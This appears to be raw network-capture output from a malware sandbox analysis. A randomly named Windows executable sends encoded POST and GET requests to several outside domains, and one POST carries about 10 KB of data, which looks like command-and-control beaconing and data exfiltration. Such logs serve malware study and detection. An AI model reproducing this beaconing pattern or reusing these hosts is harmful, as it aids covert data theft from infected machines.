                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lUb+pzwDolo2M+lKa0amaje5bjXzIBh4zIw5l5+ADOD5jcEy6LxOPMBnEyiuOIWgHO320qEqRMshvTFLVtYFbw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 23, 2024 04:09:23.180682898 CET | 547 | IN
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTQ1YWVmYjItZDFjNy00MmJmLTg2NjctODJmYTgyYzliZGI5IiwicGFnZV90aW1lIjoxNzM0OTIzMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49909 | 199.59.243.227 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:24.735997915 CET | 418 | OUT | GET /w4ic/?4v7=yS69adElfH9iGuX+6qGjDo1pzUaFwG2aAiZ0CSeLQ3WEURd5D9NqWLH4alYcst9SwKAkCKhjPGbctdXA/FIYLK0HEa0UfTU4rNsaCNMRH49YQwEuYtvnEXw=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.sob.rip
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:09:25.824857950 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:09:24 GMT
                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                              content-length: 1422
                                                                                                                                                                                                                                              x-request-id: 46682363-594a-433a-8a6a-d02f5acf7732
                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zYWP8Y3M5s4/N81Zjp5eLQIk0XBn+pwUu7Q28N35t3W3XrDSnlOoDW3Kkx03bKS6B7eNlbkNF6ydmX8SX2sQKg==
                                                                                                                                                                                                                                              set-cookie: parking_session=46682363-594a-433a-8a6a-d02f5acf7732; expires=Mon, 23 Dec 2024 03:24:25 GMT; path=/
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zYWP8Y3M5s4/N81Zjp5eLQIk0XBn+pwUu7Q28N35t3W3XrDSnlOoDW3Kkx03bKS6B7eNlbkNF6ydmX8SX2sQKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Dec 23, 2024 04:09:25.824978113 CET | 875 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDY2ODIzNjMtNTk0YS00MzNhLThhNmEtZDAyZjVhY2Y3NzMyIiwicGFnZV90aW1lIjoxNzM0OTIzMz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49928 | 192.186.58.31 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:31.542052031 CET | 692 | OUT | POST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=55C4mzc233vpFRYoSTMps9GgCq2J+Wyve/SCD08ycGVbhl6bsHKjrBQ7OfCPAS6PLaksl9+RK7c3puBU95X0CVTD9qJL4CNUBAqarJktKuLA2ZVDWm1nQt1NAJ1aYcWW197bktuduCQhMoINC2LIEUEqp3RFEhZHITQt8cSI5mw/fqeN5WK/6kmBpmDBEdhs+w==
Dec 23, 2024 04:09:33.125607967 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:32 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49935 | 192.186.58.31 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:34.208802938 CET | 712 | OUT | POST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Ascii: 4v7=55C4mzc233vpExIoJw0pudGjNK2JnGy0e/OCD1J/cVxbiEKbtGKjsBQ7G/CKOy6ILaYCl52RK7Y3prlU9O73CFTN8aJJ8CNUBAqarJgLKuDA2JlDESpgZN1OHJ1aOcWS1979ksz4uEMhMqQNCifHRkEk2nQwMQw7PHJZ3Meo8mg+esTXonrookCy0hK1JecllyMzNBYHHz40MLC+Ivmqnn8=
Dec 23, 2024 04:09:35.790000916 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:35 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: d404 Not Found0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49942 | 192.186.58.31 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:36.865643978 CET | 10794 | OUT | POST /gkfy/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.aihuzhibo.net
                                                                                                                                                                                                                                              Referer: http://www.aihuzhibo.net/gkfy/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49948 | 192.186.58.31 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:09:39.518012047 CET | 424 | OUT | GET /gkfy/?4v7=07qYlGdy+WbqOk0cXAw1tsG+BYjZolWoNNS4BkQ+NnlSijGpnUaEsXAiEpeyBCiqWtAN48ClO71D0ZdXiZHmAUTm7Ixf7FFoVzGex49KD8u42uAoUmpEbrc=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.aihuzhibo.net
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Dec 23, 2024 04:09:41.161214113 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 03:09:40 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#35910;&#22902;&#30452;&#25773;&#23433;&#21331;&#29256;&#19979;&#36733;&#24555;&#36895;&#36890;&#36947;</title><meta http-equiv="keywords" content="&#35910;&#22902;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#35910;&#22902;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#35910;&#22902;&#30452;&#25773;&#23433;&#21331;&#29256;&#20840;&#29256;&#26412;&#19979;&#36733;&#27719;&#24635;&#38500;&#20102;&#36164;&#35759;&#21644;&#30452;&#25773;&#36824;&#20250;&#20026;&#24744;&#25552;&#20379;&#19987;&#19994;&#30340;&#25968;&#25454;&#20998;&#26512;&#26381;&#21153;&#25105;&#20204;&#30340;&#25968;&#25454;&#20998;&#26512;&#28085;&#30422;&#22810;&#31181;&#36816;&#21160;&#39033;&#30446;&#21253;&#25324;&#36275;&#29699;&#31726;&#29699;&#32593;& [TRUNCATED]
Dec 23, 2024 04:09:41.161362886 CET | 1236 | IN | Data Raw: 23 32 30 39 39 38 3b 26 23 32 36 35 31 32 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 36 35 3b 26 23 32 31 32 35 33 3b 26 23 32 35 33 32 34 3b 26 23 32 37 36 30 34 3b 26 23 33 36 31 38 37 3b 26 23 32 35 39 36 38 3b 26 23 32 35 34 35 34 3b ef bc 8c
                                                                                                                                                                                                                                              Data Ascii: #20998;&#26512;&#19981;&#20165;&#21253;&#25324;&#27604;&#36187;&#25968;&#25454;&#36824;&#20250;&#20026;&#24744;&#25552;&#20379;&#29699;&#21592;&#25968;&#25454;&#21644;&#29699;&#38431;&#25968;&#25454;&#35753;&#24744;&#26356;&#22909;&#2232
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161401987 CET1236INData Raw: 69 63 2f 63 73 73 2f 70 63 6d 6f 64 75 6c 65 2e 65 64 64 34 36 33 38 63 35 63 33 62 33 30 33 39 38 33 32 33 39 30 32 36 39 64 34 30 66 31 64 38 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d
                                                                                                                                                                                                                                              Data Ascii: ic/css/pcmodule.edd4638c5c3b3039832390269d40f1d8.css"><link rel="stylesheet" href="http://www.aihuzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb034.css"></head><body cache-app-id="87215" data-app-id="8456
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161441088 CET1236INData Raw: 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 77 61 6e 64 6f 75 6a 69 61 2f 73 74 61 74 69 63 2f 6a 73 2f 72 65 61 6c 4e 61 6d 65 41 75 74 68 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69
                                                                                                                                                                                                                                              Data Ascii: /template/news/wandoujia/static/js/realNameAuth.js" crossorigin="anonymous"></script><script type="text/javascript" src="http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.js"></script><script type="text/javascript" src="http://www.
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161495924 CET896INData Raw: 68 2d 62 74 6e 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 73 6f 75 72 63 65 22 20 76 61 6c 75 65 3d 22 64 65 74 61 69 6c 22 3e 3c 2f 66 6f 72 6d 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 35 61 38 33 61
                                                                                                                                                                                                                                              Data Ascii: h-btn"><input type="hidden" name="source" value="detail"></form><small lang="5a83a6"></small><sup draggable="b2b1ca"></sup><time dropzone="db3e73"></time><div lang="4f2fc5" class="l05c9c user-info"><img draggable="a26271" class="m8910c avatar"
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161534071 CET1236INData Raw: 70 70 22 3e 3c 73 70 61 6e 3e e8 bd af e4 bb b6 e5 88 86 e7 b1 bb 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 75 63 38 31 34 30 20 20 68 61 73 2d 73 75 62 73 20 6e 61 76 2d 69 74 65 6d 20 67 61 6d 65 2d 74 61
                                                                                                                                                                                                                                              Data Ascii: pp"><span></span></a></li><li class="uc8140 has-subs nav-item game-tag-wrap"><a class="v06cd9 game-tag first-link" href="/game"><span></span></a></li><li class="weda99 nav-item"><a class="x7e04d first-link" href="/top
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161567926 CET1236INData Raw: 65 61 3e 3c 6d 61 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 36 36 32 37 34 36 22 3e 3c 2f 6d 61 70 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 38 39 31 30 63 64 22 20 63 6c 61 73 73 3d 22 6c 32 38 32 66 39 20 6c 6f 67 69 6e 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                              Data Ascii: ea><map dropzone="662746"></map><div lang="8910cd" class="l282f9 login-modal-content"><bdo date-time="458d5b"></bdo><dfn dir="7d5c84"></dfn><font lang="e5e01c"></font><div draggable="6911ee" class="m14ba6 title"></div><ins draggable="cf6
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161606073 CET1236INData Raw: e6 89 8b e6 9c ba e9 aa 8c e8 af 81 e7 a0 81 22 3e 3c 73 70 61 6e 20 69 64 3d 22 6c 6f 67 69 6e 5f 67 65 74 43 6f 64 65 22 20 63 6c 61 73 73 3d 22 76 38 65 33 65 32 20 76 65 72 69 66 79 2d 62 74 6e 20 61 63 74 69 76 65 22 3e e8 8e b7 e5 8f 96 e9
                                                                                                                                                                                                                                              Data Ascii: "><span id="login_getCode" class="v8e3e2 verify-btn active"></span></div><tt draggable="2a0f52"></tt><var dropzone="71f07d"></var><area date-time="319f66"></area><div dropzone="4ee3ec" class="w7e91a input-error-ti
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161640882 CET1236INData Raw: 22 75 73 65 72 5f 6d 6f 64 61 6c 22 20 63 6c 61 73 73 3d 22 63 30 32 38 30 64 20 75 73 65 72 2d 6d 6f 64 61 6c 22 3e 3c 69 6e 73 20 64 69 72 3d 22 64 36 32 39 34 31 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 32 63 61 34 34 63
                                                                                                                                                                                                                                              Data Ascii: "user_modal" class="c0280d user-modal"><ins dir="d62941"></ins><small lang="2ca44c"></small><sup draggable="6c1392"></sup><div date-time="53a171" class="d65e8d modal-wrap pc"><span class="e1f5db close-btn" id="user_close"></span><time dropzone
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.161679029 CET1236INData Raw: 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 30 31 66 38 35 63 22 20 63 6c 61 73 73 3d 22 6c 65 35 39 34 37 20 63 6f 6e 74 61 69 6e 65 72 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77
                                                                                                                                                                                                                                              Data Ascii: ><div lang="01f85c" class="le5947 container" itemscope=""><meta content="http://www.kanpazhibo.net" itemprop="url"><font lang="1c6ffe"></font><ins draggable="d347ff"></ins><small dropzone="9ce3c2"></small><div draggable="d33ab3" class="mde43f
                                                                                                                                                                                                                                              Dec 23, 2024 04:09:41.281788111 CET1236INData Raw: 37 37 33 3b e4 b8 8b e8 bd bd 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 69 6e 73 20 64 72 6f 70 7a 6f 6e 65 3d 22 31 65 61 61 62 34 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 64 61 74 65 2d 74 69 6d 65 3d 22 62
                                                                                                                                                                                                                                              Data Ascii: 773;</span></h1></div></div><ins dropzone="1eaab4"></ins><small date-time="b3acdd"></small><sup dir="26b860"></sup><div lang="282f9f" class="u896eb detail-wrap"><time lang="f80797"></time><tt draggable="4804c9"></tt><var dropzone="a424d0


Session ID: 21
Source IP: 192.168.2.4
Source Port: 49969
Destination IP: 103.106.67.112
Destination Port: 80
PID: 4960
Process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe

Timestamp: Dec 23, 2024 04:09:47.714456081 CET
Bytes transferred: 689
Direction: OUT
Data:
POST /3dtl/ HTTP/1.1
Host: www.furrcali.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.furrcali.xyz
Referer: http://www.furrcali.xyz/3dtl/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


Session ID: 22
Source IP: 192.168.2.4
Source Port: 49974
Destination IP: 103.106.67.112
Destination Port: 80
PID: 4960
Process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe

Timestamp: Dec 23, 2024 04:09:50.382694006 CET
Bytes transferred: 709
Direction: OUT
Data:
POST /3dtl/ HTTP/1.1
Host: www.furrcali.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.furrcali.xyz
Referer: http://www.furrcali.xyz/3dtl/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


Session ID: 23
Source IP: 192.168.2.4
Source Port: 49980
Destination IP: 103.106.67.112
Destination Port: 80
PID: 4960
Process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe

Timestamp: Dec 23, 2024 04:09:53.038630009 CET
Bytes transferred: 10791
Direction: OUT
Data:
POST /3dtl/ HTTP/1.1
Host: www.furrcali.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.furrcali.xyz
Referer: http://www.furrcali.xyz/3dtl/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10300
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


Session ID: 24
Source IP: 192.168.2.4
Source Port: 49988
Destination IP: 103.106.67.112
Destination Port: 80
PID: 4960
Process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe

Timestamp: Dec 23, 2024 04:09:55.689892054 CET
Bytes transferred: 423
Direction: OUT
Data:
GET /3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0 HTTP/1.1
Host: www.furrcali.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0


Session ID: 25
Source IP: 192.168.2.4
Source Port: 50007
Destination IP: 185.68.108.243
Destination Port: 80
PID: 4960
Process: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe

Timestamp: Dec 23, 2024 04:10:03.942928076 CET
Bytes transferred: 701
Direction: OUT
Data:
POST /45u5/ HTTP/1.1
Host: www.accusolution.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.accusolution.pro
Referer: http://www.accusolution.pro/45u5/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7=5RomxzjFWKN8VtTBZrEQjB1E9HlvN8+2c+ypYcWzOCTTTkdGdOHutLN4NzsHq4zbZSyzD7ArgtVmMiAl4YkTQz434+4B2kveCHvyLbHo4xSmHvQrz+GMYtY/sKvKLDW9t6/0GvlYFm8BQzfh2Z2tO/vvbCiVnsgsVFN404OJwqfVTszfU/ZrSw347dSAXSJi8w==
Dec 23, 2024 04:10:05.153470039 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 23 Dec 2024 03:10:04 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 23, 2024 04:10:05.153528929 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50016 | 185.68.108.243 | 80 | 4960 | C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 04:10:06.598787069 CET | 721 | OUT | POST /45u5/ HTTP/1.1
Host: www.accusolution.pro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.accusolution.pro
Referer: http://www.accusolution.pro/45u5/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
Data Ascii: 4v7=5RomxzjFWKN8UNjBVr4Q0x1Hynlvf8+yc++pYYOjP0jTTHJGcLruqLN4ZjsCnYzAZSvOD68rgtBmMn8l5rccSj5R++4D5EveCHvyLbTS4w2mHfgrhsuDHdY+rKvKaTX0t6/CGupyFkEBQxHh1I2qE/vhViiA3YtIS04q0+bn3LXHWq+FFO48AwTLmab0aR0rn5AwuPnrz4vvRSzieRsUsvE=
Dec 23, 2024 04:10:07.867351055 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 23 Dec 2024 03:10:07 GMT
server: LiteSpeed
